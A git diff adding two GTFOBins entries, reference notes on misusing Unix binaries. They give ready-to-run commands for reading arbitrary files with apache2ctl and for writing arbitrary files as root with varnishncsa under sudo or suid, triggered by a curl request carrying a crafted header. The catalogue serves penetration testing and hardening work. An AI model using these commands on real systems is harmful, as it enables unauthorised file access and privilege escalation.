diff --git a/_gtfobins/apache2ctl.md b/_gtfobins/apache2ctl.md
new file mode 100644
index 0000000..20280e0
--- /dev/null
+++ b/_gtfobins/apache2ctl.md
@@ -0,0 +1,12 @@
+---
+description: This includes the file in the actual configuration file, the first line is leaked as an error message.
+functions:
+  file-read:
+    - code: |
+        LFILE=file_to_read
+        apache2ctl -c "Include $LFILE" -k stop
+  sudo:
+    - code: |
+        LFILE=file_to_read
+        sudo apache2ctl -c "Include $LFILE" -k stop
+---
diff --git a/_gtfobins/varnishncsa.md b/_gtfobins/varnishncsa.md
new file mode 100644
index 0000000..1f803dd
--- /dev/null
+++ b/_gtfobins/varnishncsa.md
@@ -0,0 +1,17 @@
+---
+description: |
+  This allows to write arbitrary files as root, provided that the proper HTTP response is made. Specifically the content of a certain header will be written in the file. First start `varnishncsa` as follows, then trigger the file write with:
+
+  ```
+  curl -H 'yyy: DATA' http://localhost:6081/xxx
+  ```
+functions:
+  sudo:
+    - code: |
+        LFILE=file_to_write
+        sudo varnishncsa -g request -q 'ReqURL ~ "/xxx"' -F '%{yyy}i' -w "$LFILE"
+  suid:
+    - code: |
+        LFILE=file_to_write
+        ./varnishncsa -g request -q 'ReqURL ~ "/xxx"' -F '%{yyy}i' -w "$LFILE"
+---